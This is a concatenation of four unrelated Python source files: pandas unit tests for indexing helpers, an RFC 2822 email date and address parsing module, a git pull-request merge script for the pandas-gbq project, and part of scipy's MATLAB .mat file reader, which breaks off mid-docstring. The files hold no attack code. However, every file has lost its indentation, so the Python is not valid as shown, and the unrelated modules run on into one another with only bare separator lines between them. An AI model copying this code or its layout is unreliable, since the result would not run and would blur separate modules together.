class TestMisc(object):
def test_max_len_string_array(self):
arr = a = np.array(['foo', 'b', np.nan], dtype='object')
assert libwriters.max_len_string_array(arr) == 3
# unicode
arr = a.astype('U').astype(object)
assert libwriters.max_len_string_array(arr) == 3
# bytes for python3
arr = a.astype('S').astype(object)
assert libwriters.max_len_string_array(arr) == 3
# raises
with pytest.raises(TypeError):
libwriters.max_len_string_array(arr.astype('U'))
def test_fast_unique_multiple_list_gen_sort(self):
keys = [['p', 'a'], ['n', 'd'], ['a', 's']]
gen = (key for key in keys)
expected = np.array(['a', 'd', 'n', 'p', 's'])
out = lib.fast_unique_multiple_list_gen(gen, sort=True)
tm.assert_numpy_array_equal(np.array(out), expected)
gen = (key for key in keys)
expected = np.array(['p', 'a', 'n', 'd', 's'])
out = lib.fast_unique_multiple_list_gen(gen, sort=False)
tm.assert_numpy_array_equal(np.array(out), expected)
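# maybe_indices_to_slice collapses an int64 indexer into an equivalent slice
# whenever the indices form an arithmetic progression within the target's
# bounds (slicing is cheaper than fancy indexing); otherwise it hands the
# original indices back unchanged. The tests below exercise both outcomes at
# the edges and in the middle of the target.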
class TestIndexing(object):
def test_maybe_indices_to_slice_left_edge(self):
target = np.arange(100)
# slice
indices = np.array([], dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(target[indices], target[maybe_slice])
for end in [1, 2, 5, 20, 99]:
for step in [1, 2, 4]:
indices = np.arange(0, end, step, dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(target[indices],
target[maybe_slice])
# reverse
indices = indices[::-1]
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(target[indices],
target[maybe_slice])
# not slice
for case in [[2, 1, 2, 0], [2, 2, 1, 0], [0, 1, 2, 1], [-2, 0, 2],
[2, 0, -2]]:
indices = np.array(case, dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert not isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(maybe_slice, indices)
tm.assert_numpy_array_equal(target[indices], target[maybe_slice])
def test_maybe_indices_to_slice_right_edge(self):
target = np.arange(100)
# slice
for start in [0, 2, 5, 20, 97, 98]:
for step in [1, 2, 4]:
indices = np.arange(start, 99, step, dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(target[indices],
target[maybe_slice])
# reverse
indices = indices[::-1]
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(target[indices],
target[maybe_slice])
# not slice
indices = np.array([97, 98, 99, 100], dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert not isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(maybe_slice, indices)
with pytest.raises(IndexError):
target[indices]
with pytest.raises(IndexError):
target[maybe_slice]
indices = np.array([100, 99, 98, 97], dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert not isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(maybe_slice, indices)
with pytest.raises(IndexError):
target[indices]
with pytest.raises(IndexError):
target[maybe_slice]
for case in [[99, 97, 99, 96], [99, 99, 98, 97], [98, 98, 97, 96]]:
indices = np.array(case, dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert not isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(maybe_slice, indices)
tm.assert_numpy_array_equal(target[indices], target[maybe_slice])
def test_maybe_indices_to_slice_both_edges(self):
target = np.arange(10)
# slice
for step in [1, 2, 4, 5, 8, 9]:
indices = np.arange(0, 9, step, dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(target[indices], target[maybe_slice])
# reverse
indices = indices[::-1]
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(target[indices], target[maybe_slice])
# not slice
for case in [[4, 2, 0, -2], [2, 2, 1, 0], [0, 1, 2, 1]]:
indices = np.array(case, dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert not isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(maybe_slice, indices)
tm.assert_numpy_array_equal(target[indices], target[maybe_slice])
def test_maybe_indices_to_slice_middle(self):
target = np.arange(100)
# slice
for start, end in [(2, 10), (5, 25), (65, 97)]:
for step in [1, 2, 4, 20]:
indices = np.arange(start, end, step, dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(target[indices],
target[maybe_slice])
# reverse
indices = indices[::-1]
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(target[indices],
target[maybe_slice])
# not slice
for case in [[14, 12, 10, 12], [12, 12, 11, 10], [10, 11, 12, 11]]:
indices = np.array(case, dtype=np.int64)
maybe_slice = lib.maybe_indices_to_slice(indices, len(target))
assert not isinstance(maybe_slice, slice)
tm.assert_numpy_array_equal(maybe_slice, indices)
tm.assert_numpy_array_equal(target[indices], target[maybe_slice])
def test_maybe_booleans_to_slice(self):
arr = np.array([0, 0, 1, 1, 1, 0, 1], dtype=np.uint8)
result = lib.maybe_booleans_to_slice(arr)
assert result.dtype == np.bool_
result = lib.maybe_booleans_to_slice(arr[:0])
assert result == slice(0, 0)
def test_get_reverse_indexer(self):
indexer = np.array([-1, -1, 1, 2, 0, -1, 3, 4], dtype=np.int64)
result = lib.get_reverse_indexer(indexer, 5)
expected = np.array([4, 2, 3, 6, 7], dtype=np.int64)
tm.assert_numpy_array_equal(result, expected)
def test_cache_readonly_preserve_docstrings():
# GH18197
assert Index.hasnans.__doc__ is not None
|
|
# Copyright (C) 2002-2007 Python Software Foundation
# Contact: email-sig@python.org
"""Email address parsing code.
Lifted directly from rfc822.py. This should eventually be rewritten.
"""
__all__ = [
'mktime_tz',
'parsedate',
'parsedate_tz',
'quote',
]
import time
SPACE = ' '
EMPTYSTRING = ''
COMMASPACE = ', '
# Parse a date field
_monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul',
'aug', 'sep', 'oct', 'nov', 'dec',
'january', 'february', 'march', 'april', 'may', 'june', 'july',
'august', 'september', 'october', 'november', 'december']
_daynames = ['mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun']
# The timezone table does not include the military time zones defined
# in RFC822, other than Z. According to RFC1123, the description in
# RFC822 gets the signs wrong, so we can't rely on any such time
# zones. RFC1123 recommends that numeric timezone indicators be used
# instead of timezone names.
_timezones = {'UT':0, 'UTC':0, 'GMT':0, 'Z':0,
'AST': -400, 'ADT': -300, # Atlantic (used in Canada)
'EST': -500, 'EDT': -400, # Eastern
'CST': -600, 'CDT': -500, # Central
'MST': -700, 'MDT': -600, # Mountain
'PST': -800, 'PDT': -700 # Pacific
}
def parsedate_tz(data):
"""Convert a date string to a time tuple.
Accounts for military timezones.
"""
data = data.split()
# The FWS after the comma after the day-of-week is optional, so search and
# adjust for this.
if data[0].endswith(',') or data[0].lower() in _daynames:
# There's a dayname here. Skip it
del data[0]
else:
i = data[0].rfind(',')
if i >= 0:
data[0] = data[0][i+1:]
if len(data) == 3: # RFC 850 date, deprecated
stuff = data[0].split('-')
if len(stuff) == 3:
data = stuff + data[1:]
if len(data) == 4:
s = data[3]
i = s.find('+')
if i == -1:
i = s.find('-')
if i > 0:
data[3:] = [s[:i], s[i:]]
else:
data.append('') # Dummy tz
if len(data) < 5:
return None
data = data[:5]
[dd, mm, yy, tm, tz] = data
mm = mm.lower()
if mm not in _monthnames:
dd, mm = mm, dd.lower()
if mm not in _monthnames:
return None
mm = _monthnames.index(mm) + 1
if mm > 12:
mm -= 12
if dd[-1] == ',':
dd = dd[:-1]
i = yy.find(':')
if i > 0:
yy, tm = tm, yy
if yy[-1] == ',':
yy = yy[:-1]
if not yy[0].isdigit():
yy, tz = tz, yy
if tm[-1] == ',':
tm = tm[:-1]
tm = tm.split(':')
if len(tm) == 2:
[thh, tmm] = tm
tss = '0'
elif len(tm) == 3:
[thh, tmm, tss] = tm
else:
return None
try:
yy = int(yy)
dd = int(dd)
thh = int(thh)
tmm = int(tmm)
tss = int(tss)
except ValueError:
return None
# Check for a yy specified in two-digit format, then convert it to the
# appropriate four-digit format, according to the POSIX standard. RFC 822
# calls for a two-digit yy, but RFC 2822 (which obsoletes RFC 822)
# mandates a 4-digit yy. For more information, see the documentation for
# the time module.
if yy < 100:
# The year is between 1969 and 1999 (inclusive).
if yy > 68:
yy += 1900
# The year is between 2000 and 2068 (inclusive).
else:
yy += 2000
tzoffset = None
tz = tz.upper()
if tz in _timezones:
tzoffset = _timezones[tz]
else:
try:
tzoffset = int(tz)
except ValueError:
pass
    # Convert a timezone offset into seconds; -0500 -> -18000
if tzoffset:
if tzoffset < 0:
tzsign = -1
tzoffset = -tzoffset
else:
tzsign = 1
        tzoffset = tzsign * ((tzoffset//100)*3600 + (tzoffset % 100)*60)
# Daylight Saving Time flag is set to -1, since DST is unknown.
return yy, mm, dd, thh, tmm, tss, 0, 1, -1, tzoffset
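# Example: parsedate_tz('Fri, 09 Nov 2001 01:08:47 -0000') returns
# (2001, 11, 9, 1, 8, 47, 0, 1, -1, 0); the last element is the timezone
# offset in seconds east of UTC (None when the zone cannot be parsed).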
def parsedate(data):
"""Convert a time string to a time tuple."""
t = parsedate_tz(data)
if isinstance(t, tuple):
return t[:9]
else:
return t
def mktime_tz(data):
"""Turn a 10-tuple as returned by parsedate_tz() into a UTC timestamp."""
if data[9] is None:
# No zone info, so localtime is better assumption than GMT
return time.mktime(data[:8] + (-1,))
else:
t = time.mktime(data[:8] + (0,))
return t - data[9] - time.timezone
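# Example: mktime_tz(parsedate_tz('Fri, 09 Nov 2001 01:08:47 -0000')) yields
# 1005268127.0, the POSIX timestamp of that UTC instant.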
def quote(str):
"""Prepare string to be used in a quoted string.
Turns backslash and double quote characters into quoted pairs. These
are the only characters that need to be quoted inside a quoted string.
Does not add the surrounding double quotes.
"""
return str.replace('\\', '\\\\').replace('"', '\\"')
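# Example: quote() turns the string  he said "hi"  into  he said \"hi\"  and
# doubles any backslashes; it does not add the surrounding double quotes.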
class AddrlistClass:
"""Address parser class by Ben Escoto.
To understand what this class does, it helps to have a copy of RFC 2822 in
front of you.
Note: this class interface is deprecated and may be removed in the future.
Use email.utils.AddressList instead.
"""
def __init__(self, field):
"""Initialize a new instance.
`field' is an unparsed address header field, containing
one or more addresses.
"""
self.specials = '()<>@,:;.\"[]'
self.pos = 0
self.LWS = ' \t'
self.CR = '\r\n'
self.FWS = self.LWS + self.CR
self.atomends = self.specials + self.LWS + self.CR
# Note that RFC 2822 now specifies `.' as obs-phrase, meaning that it
# is obsolete syntax. RFC 2822 requires that we recognize obsolete
# syntax, so allow dots in phrases.
self.phraseends = self.atomends.replace('.', '')
self.field = field
self.commentlist = []
def gotonext(self):
"""Skip white space and extract comments."""
wslist = []
while self.pos < len(self.field):
if self.field[self.pos] in self.LWS + '\n\r':
if self.field[self.pos] not in '\n\r':
wslist.append(self.field[self.pos])
self.pos += 1
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
else:
break
return EMPTYSTRING.join(wslist)
def getaddrlist(self):
"""Parse all addresses.
Returns a list containing all of the addresses.
"""
result = []
while self.pos < len(self.field):
ad = self.getaddress()
if ad:
result += ad
else:
result.append(('', ''))
return result
def getaddress(self):
"""Parse the next address."""
self.commentlist = []
self.gotonext()
oldpos = self.pos
oldcl = self.commentlist
plist = self.getphraselist()
self.gotonext()
returnlist = []
if self.pos >= len(self.field):
# Bad email address technically, no domain.
if plist:
returnlist = [(SPACE.join(self.commentlist), plist[0])]
elif self.field[self.pos] in '.@':
# email address is just an addrspec
# this isn't very efficient since we start over
self.pos = oldpos
self.commentlist = oldcl
addrspec = self.getaddrspec()
returnlist = [(SPACE.join(self.commentlist), addrspec)]
elif self.field[self.pos] == ':':
# address is a group
returnlist = []
fieldlen = len(self.field)
self.pos += 1
while self.pos < len(self.field):
self.gotonext()
if self.pos < fieldlen and self.field[self.pos] == ';':
self.pos += 1
break
returnlist = returnlist + self.getaddress()
elif self.field[self.pos] == '<':
# Address is a phrase then a route addr
routeaddr = self.getrouteaddr()
if self.commentlist:
returnlist = [(SPACE.join(plist) + ' (' +
' '.join(self.commentlist) + ')', routeaddr)]
else:
returnlist = [(SPACE.join(plist), routeaddr)]
else:
if plist:
returnlist = [(SPACE.join(self.commentlist), plist[0])]
elif self.field[self.pos] in self.specials:
self.pos += 1
self.gotonext()
if self.pos < len(self.field) and self.field[self.pos] == ',':
self.pos += 1
return returnlist
def getrouteaddr(self):
"""Parse a route address (Return-path value).
This method just skips all the route stuff and returns the addrspec.
"""
if self.field[self.pos] != '<':
return
expectroute = False
self.pos += 1
self.gotonext()
adlist = ''
while self.pos < len(self.field):
if expectroute:
self.getdomain()
expectroute = False
elif self.field[self.pos] == '>':
self.pos += 1
break
elif self.field[self.pos] == '@':
self.pos += 1
expectroute = True
elif self.field[self.pos] == ':':
self.pos += 1
else:
adlist = self.getaddrspec()
self.pos += 1
break
self.gotonext()
return adlist
def getaddrspec(self):
"""Parse an RFC 2822 addr-spec."""
aslist = []
self.gotonext()
while self.pos < len(self.field):
preserve_ws = True
if self.field[self.pos] == '.':
if aslist and not aslist[-1].strip():
aslist.pop()
aslist.append('.')
self.pos += 1
preserve_ws = False
elif self.field[self.pos] == '"':
aslist.append('"%s"' % quote(self.getquote()))
elif self.field[self.pos] in self.atomends:
if aslist and not aslist[-1].strip():
aslist.pop()
break
else:
aslist.append(self.getatom())
ws = self.gotonext()
if preserve_ws and ws:
aslist.append(ws)
if self.pos >= len(self.field) or self.field[self.pos] != '@':
return EMPTYSTRING.join(aslist)
aslist.append('@')
self.pos += 1
self.gotonext()
return EMPTYSTRING.join(aslist) + self.getdomain()
def getdomain(self):
"""Get the complete domain name from an address."""
sdlist = []
while self.pos < len(self.field):
if self.field[self.pos] in self.LWS:
self.pos += 1
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
elif self.field[self.pos] == '[':
sdlist.append(self.getdomainliteral())
elif self.field[self.pos] == '.':
self.pos += 1
sdlist.append('.')
elif self.field[self.pos] in self.atomends:
break
else:
sdlist.append(self.getatom())
return EMPTYSTRING.join(sdlist)
def getdelimited(self, beginchar, endchars, allowcomments=True):
"""Parse a header fragment delimited by special characters.
`beginchar' is the start character for the fragment.
If self is not looking at an instance of `beginchar' then
getdelimited returns the empty string.
`endchars' is a sequence of allowable end-delimiting characters.
Parsing stops when one of these is encountered.
If `allowcomments' is non-zero, embedded RFC 2822 comments are allowed
within the parsed fragment.
"""
if self.field[self.pos] != beginchar:
return ''
slist = ['']
quote = False
self.pos += 1
while self.pos < len(self.field):
if quote:
slist.append(self.field[self.pos])
quote = False
elif self.field[self.pos] in endchars:
self.pos += 1
break
elif allowcomments and self.field[self.pos] == '(':
slist.append(self.getcomment())
continue # have already advanced pos from getcomment
elif self.field[self.pos] == '\\':
quote = True
else:
slist.append(self.field[self.pos])
self.pos += 1
return EMPTYSTRING.join(slist)
def getquote(self):
"""Get a quote-delimited fragment from self's field."""
return self.getdelimited('"', '"\r', False)
def getcomment(self):
"""Get a parenthesis-delimited fragment from self's field."""
return self.getdelimited('(', ')\r', True)
def getdomainliteral(self):
"""Parse an RFC 2822 domain-literal."""
return '[%s]' % self.getdelimited('[', ']\r', False)
def getatom(self, atomends=None):
"""Parse an RFC 2822 atom.
Optional atomends specifies a different set of end token delimiters
(the default is to use self.atomends). This is used e.g. in
getphraselist() since phrase endings must not include the `.' (which
is legal in phrases)."""
atomlist = ['']
if atomends is None:
atomends = self.atomends
while self.pos < len(self.field):
if self.field[self.pos] in atomends:
break
else:
atomlist.append(self.field[self.pos])
self.pos += 1
return EMPTYSTRING.join(atomlist)
def getphraselist(self):
"""Parse a sequence of RFC 2822 phrases.
A phrase is a sequence of words, which are in turn either RFC 2822
atoms or quoted-strings. Phrases are canonicalized by squeezing all
runs of continuous whitespace into one space.
"""
plist = []
while self.pos < len(self.field):
if self.field[self.pos] in self.FWS:
self.pos += 1
elif self.field[self.pos] == '"':
plist.append(self.getquote())
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
elif self.field[self.pos] in self.phraseends:
break
else:
plist.append(self.getatom(self.phraseends))
return plist
class AddressList(AddrlistClass):
"""An AddressList encapsulates a list of parsed RFC 2822 addresses."""
def __init__(self, field):
AddrlistClass.__init__(self, field)
if field:
self.addresslist = self.getaddrlist()
else:
self.addresslist = []
def __len__(self):
return len(self.addresslist)
def __add__(self, other):
# Set union
newaddr = AddressList(None)
newaddr.addresslist = self.addresslist[:]
for x in other.addresslist:
            if x not in self.addresslist:
newaddr.addresslist.append(x)
return newaddr
def __iadd__(self, other):
# Set union, in-place
for x in other.addresslist:
            if x not in self.addresslist:
self.addresslist.append(x)
return self
def __sub__(self, other):
# Set difference
newaddr = AddressList(None)
for x in self.addresslist:
            if x not in other.addresslist:
newaddr.addresslist.append(x)
return newaddr
def __isub__(self, other):
# Set difference, in-place
for x in other.addresslist:
if x in self.addresslist:
self.addresslist.remove(x)
return self
def __getitem__(self, index):
# Make indexing, slices, and 'in' work
return self.addresslist[index]
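# Illustrative usage (the addresses here are made up):
#     al = AddressList('Jane Doe <jane@example.com>, bob@example.org')
#     al.addresslist == [('Jane Doe', 'jane@example.com'),
#                        ('', 'bob@example.org')]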
|
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Utility for creating well-formed pull request merges and pushing them to
# Apache.
# usage: ./apache-pr-merge.py (see config env vars below)
#
# Lightly modified from version of this script in incubator-parquet-format
from __future__ import print_function
from subprocess import check_output
from requests.auth import HTTPBasicAuth
import requests
import os
import six
import sys
import textwrap
from six.moves import input
PANDASGBQ_HOME = '.'
PROJECT_NAME = 'pandas-gbq'
print("PANDASGBQ_HOME = " + PANDASGBQ_HOME)
# Remote name with the PR
PR_REMOTE_NAME = os.environ.get("PR_REMOTE_NAME", "upstream")
# Remote name where results pushed
PUSH_REMOTE_NAME = os.environ.get("PUSH_REMOTE_NAME", "upstream")
GITHUB_BASE = "https://github.com/pydata/" + PROJECT_NAME + "/pull"
GITHUB_API_BASE = "https://api.github.com/repos/pydata/" + PROJECT_NAME
# Prefix added to temporary branches
BRANCH_PREFIX = "PR_TOOL"
os.chdir(PANDASGBQ_HOME)
auth_required = False
if auth_required:
GITHUB_USERNAME = os.environ['GITHUB_USER']
import getpass
GITHUB_PASSWORD = getpass.getpass('Enter github.com password for %s:'
% GITHUB_USERNAME)
def get_json_auth(url):
auth = HTTPBasicAuth(GITHUB_USERNAME, GITHUB_PASSWORD)
req = requests.get(url, auth=auth)
return req.json()
get_json = get_json_auth
else:
def get_json_no_auth(url):
req = requests.get(url)
return req.json()
get_json = get_json_no_auth
def fail(msg):
print(msg)
clean_up()
sys.exit(-1)
def run_cmd(cmd):
if isinstance(cmd, six.string_types):
cmd = cmd.split(' ')
output = check_output(cmd)
if isinstance(output, six.binary_type):
output = output.decode('utf-8')
return output
def continue_maybe(prompt):
result = input("\n%s (y/n): " % prompt)
if result.lower() != "y":
fail("Okay, exiting")
original_head = run_cmd("git rev-parse HEAD")[:8]
def clean_up():
print("Restoring head pointer to %s" % original_head)
run_cmd("git checkout %s" % original_head)
branches = run_cmd("git branch").replace(" ", "").split("\n")
for branch in [b for b in branches if b.startswith(BRANCH_PREFIX)]:
print("Deleting local branch %s" % branch)
run_cmd("git branch -D %s" % branch)
# Merge the requested PR and return the merge hash
def merge_pr(pr_num, target_ref):
pr_branch_name = "%s_MERGE_PR_%s" % (BRANCH_PREFIX, pr_num)
target_branch_name = "%s_MERGE_PR_%s_%s" % (BRANCH_PREFIX, pr_num,
target_ref.upper())
run_cmd("git fetch %s pull/%s/head:%s" % (PR_REMOTE_NAME, pr_num,
pr_branch_name))
run_cmd("git fetch %s %s:%s" % (PUSH_REMOTE_NAME, target_ref,
target_branch_name))
run_cmd("git checkout %s" % target_branch_name)
had_conflicts = False
try:
run_cmd(['git', 'merge', pr_branch_name, '--squash'])
except Exception as e:
msg = ("Error merging: %s\nWould you like to manually fix-up "
"this merge?" % e)
continue_maybe(msg)
msg = ("Okay, please fix any conflicts and 'git add' "
"conflicting files... Finished?")
continue_maybe(msg)
had_conflicts = True
commit_authors = run_cmd(['git', 'log', 'HEAD..%s' % pr_branch_name,
'--pretty=format:%an <%ae>']).split("\n")
distinct_authors = sorted(set(commit_authors),
key=lambda x: commit_authors.count(x),
reverse=True)
primary_author = distinct_authors[0]
commits = run_cmd(['git', 'log', 'HEAD..%s' % pr_branch_name,
'--pretty=format:%h [%an] %s']).split("\n\n")
merge_message_flags = []
merge_message_flags += ["-m", title]
if body is not None:
merge_message_flags += ["-m", '\n'.join(textwrap.wrap(body))]
authors = "\n".join(["Author: %s" % a for a in distinct_authors])
merge_message_flags += ["-m", authors]
if had_conflicts:
committer_name = run_cmd("git config --get user.name").strip()
committer_email = run_cmd("git config --get user.email").strip()
message = ("This patch had conflicts when merged, "
"resolved by\nCommitter: %s <%s>"
% (committer_name, committer_email))
merge_message_flags += ["-m", message]
# The string "Closes #%s" string is required for GitHub to correctly close
# the PR
merge_message_flags += [
"-m",
"Closes #%s from %s and squashes the following commits:"
% (pr_num, pr_repo_desc)]
for c in commits:
merge_message_flags += ["-m", c]
run_cmd(['git', 'commit', '--author="%s"' % primary_author] +
merge_message_flags)
continue_maybe("Merge complete (local ref %s). Push to %s?" % (
target_branch_name, PUSH_REMOTE_NAME))
try:
run_cmd('git push %s %s:%s' % (PUSH_REMOTE_NAME, target_branch_name,
target_ref))
except Exception as e:
clean_up()
fail("Exception while pushing: %s" % e)
merge_hash = run_cmd("git rev-parse %s" % target_branch_name)[:8]
clean_up()
print("Pull request #%s merged!" % pr_num)
print("Merge hash: %s" % merge_hash)
return merge_hash
def cherry_pick(pr_num, merge_hash, default_branch):
pick_ref = input("Enter a branch name [%s]: " % default_branch)
if pick_ref == "":
pick_ref = default_branch
pick_branch_name = "%s_PICK_PR_%s_%s" % (BRANCH_PREFIX, pr_num,
pick_ref.upper())
run_cmd("git fetch %s %s:%s" % (PUSH_REMOTE_NAME, pick_ref,
pick_branch_name))
run_cmd("git checkout %s" % pick_branch_name)
run_cmd("git cherry-pick -sx %s" % merge_hash)
continue_maybe("Pick complete (local ref %s). Push to %s?" % (
pick_branch_name, PUSH_REMOTE_NAME))
try:
run_cmd('git push %s %s:%s' % (PUSH_REMOTE_NAME, pick_branch_name,
pick_ref))
except Exception as e:
clean_up()
fail("Exception while pushing: %s" % e)
pick_hash = run_cmd("git rev-parse %s" % pick_branch_name)[:8]
clean_up()
print("Pull request #%s picked into %s!" % (pr_num, pick_ref))
print("Pick hash: %s" % pick_hash)
return pick_ref
def fix_version_from_branch(branch, versions):
# Note: Assumes this is a sorted (newest->oldest) list of un-released
# versions
if branch == "master":
return versions[0]
else:
branch_ver = branch.replace("branch-", "")
        # filter() returns an iterator on Python 3, so build a list before
        # indexing into it
        return [x for x in versions if x.name.startswith(branch_ver)][-1]
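# For example (hedged; version objects are assumed to expose a .name), given
# versions named ['0.3.0', '0.2.1', '0.2.0'] (newest first), 'master' maps to
# '0.3.0' while 'branch-0.2' maps to '0.2.0'.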
pr_num = input("Which pull request would you like to merge? (e.g. 34): ")
pr = get_json("%s/pulls/%s" % (GITHUB_API_BASE, pr_num))
url = pr["url"]
title = pr["title"]
body = pr["body"]
target_ref = pr["base"]["ref"]
user_login = pr["user"]["login"]
base_ref = pr["head"]["ref"]
pr_repo_desc = "%s/%s" % (user_login, base_ref)
if pr["merged"] is True:
print("Pull request {0} has already been merged, please backport manually"
.format(pr_num))
sys.exit(0)
if not bool(pr["mergeable"]):
msg = ("Pull request {0} is not mergeable in its current form.\n"
"Continue? (experts only!)".format(pr_num))
continue_maybe(msg)
print("\n=== Pull Request #%s ===" % pr_num)
print("title\t%s\nsource\t%s\ntarget\t%s\nurl\t%s"
% (title, pr_repo_desc, target_ref, url))
continue_maybe("Proceed with merging pull request #%s?" % pr_num)
merged_refs = [target_ref]
merge_hash = merge_pr(pr_num, target_ref)
|
|
"""
Module for reading and writing matlab (TM) .mat files
"""
# Authors: Travis Oliphant, Matthew Brett
from __future__ import division, print_function, absolute_import
import os
import sys
import warnings
from scipy.lib.six import string_types
from .miobase import get_matfile_version, docfiller
from .mio4 import MatFile4Reader, MatFile4Writer
from .mio5 import MatFile5Reader, MatFile5Writer
__all__ = ['find_mat_file', 'mat_reader_factory', 'loadmat', 'savemat',
'whosmat']
@docfiller
def find_mat_file(file_name, appendmat=True):
''' Try to find .mat file on system path
Parameters
----------
file_name : str
file name for mat file
%(append_arg)s
Returns
-------
full_name : string
possibly modified name after path search
'''
warnings.warn('Searching for mat files on python system path will be ' +
'removed in next version of scipy',
DeprecationWarning, stacklevel=2)
if appendmat and file_name.endswith(".mat"):
file_name = file_name[:-4]
if os.sep in file_name:
full_name = file_name
if appendmat:
full_name = file_name + ".mat"
else:
full_name = None
junk, file_name = os.path.split(file_name)
for path in [os.curdir] + list(sys.path):
test_name = os.path.join(path, file_name)
if appendmat:
test_name += ".mat"
try:
fid = open(test_name,'rb')
fid.close()
full_name = test_name
break
except IOError:
pass
return full_name
def _open_file(file_like, appendmat):
''' Open `file_like` and return as file-like object '''
if isinstance(file_like, string_types):
try:
return open(file_like, 'rb')
except IOError:
pass
if appendmat and not file_like.endswith('.mat'):
try:
return open(file_like + '.mat', 'rb')
except IOError:
pass
# search the python path - we'll remove this soon
full_name = find_mat_file(file_like, appendmat)
if full_name is None:
raise IOError("%s not found on the path."
% file_like)
return open(full_name, 'rb')
# not a string - maybe file-like object
try:
file_like.read(0)
except AttributeError:
raise IOError('Reader needs file name or open file-like object')
return file_like
@docfiller
def mat_reader_factory(file_name, appendmat=True, **kwargs):
"""Create reader for matlab .mat format files
Parameters
----------
%(file_arg)s
%(append_arg)s
%(load_args)s
%(struct_arg)s
Returns
-------
matreader : MatFileReader object
Initialized instance of MatFileReader class matching the mat file
type detected in `filename`.
"""
byte_stream = _open_file(file_name, appendmat)
mjv, mnv = get_matfile_version(byte_stream)
if mjv == 0:
return MatFile4Reader(byte_stream, **kwargs)
elif mjv == 1:
return MatFile5Reader(byte_stream, **kwargs)
elif mjv == 2:
raise NotImplementedError('Please use HDF reader for matlab v7.3 files')
else:
raise TypeError('Did not recognize version %s' % mjv)
@docfiller
def loadmat(file_name, mdict=None, appendmat=True, **kwargs):
"""
Load MATLAB file
Parameters
----------
file_name : str
Name of the mat file (do not need .mat extension if
appendmat==True) Can also pass open file-like object.
    mdict : dict, optional
Dictionary in which to insert matfile variables.
appendmat : bool, optional
True to append the .mat extension to the end of the given
filename, if not already present.
byte_order : str or None, optional
None by default, implying byte order guessed from mat
file. Otherwise can be one of ('native', '=', 'little', '<',
'BIG', '>').
mat_dtype : bool, optional
If True, return arrays in same dtype as would be loaded into
MATLAB (instead of the dtype with which they are saved).
squeeze_me : bool, optional
Whether to squeeze unit matrix dimensions or not.
chars_as_strings : bool, optional
Whether to convert char arrays to string arrays.
matlab_compatible : bool, optional
Returns matrices as would be loaded by MATLAB (implies
squeeze_me=False, chars_as_strings=False, mat_dtype=True,
struct_as_record=True).
struct_as_record : bool, optional
Whether to load MATLAB structs as numpy record arrays, or as
old-style numpy arrays with dtype=object. Setting this flag to
False replicates the behavior of scipy version 0.7.x (returning
numpy object arrays). The default setting is True, because it
allows easier round-trip load and save of MATLAB files.
variable_names : None or sequence
If None (the default) - read all variables in file. Otherwise
`variable_names` should be a sequence of strings, giving names of the
matlab variables to read from the file. The reader will skip any
variable with a name not in this sequence, possibly saving some read
processing.
Returns
-------
mat_dict : dict
dictionary with variable names as keys, and loaded matrices as
values
Notes
-----
v4 (Level 1.0), v6 and v7 to 7.2 matfiles are supported.
You will need an HDF5 python library to read matlab 7.3 format mat
files. Because scipy does not supply one, we do not implement the
HDF5 / 7.3 interface here.
"""
variable_names = kwargs.pop('variable_names', None)
MR = mat_reader_factory(file_name, appendmat, **kwargs)
matfile_dict = MR.get_variables(variable_names)
if mdict is not None:
mdict.update(matfile_dict)
else:
mdict = matfile_dict
if isinstance(file_name, string_types):
MR.mat_stream.close()
return mdict
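# Illustrative usage (hedged; the file and variable names are hypothetical):
#     data = loadmat('session.mat', squeeze_me=True)
#     trials = data['trials']  # variables are keyed by their MATLAB names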
@docfiller
def savemat(file_name, mdict,
appendmat=True,
format='5',
long_field_names=False,
do_compression=False,
oned_as=None):
"""
Save a dictionary of names and arrays into a MATLAB-style .mat file.
This saves the array objects in the given dictionary to a MATLAB-
style .mat file.
Parameters
----------
file_name : str or file-like object
Name of the .mat file (.mat extension not needed if ``appendmat ==
True``).
Can also pass open file_like object.
mdict : dict
Dictionary from which to save matfile variables.
appendmat : bool, optional
True (the default) to append the .mat extension to the end of the
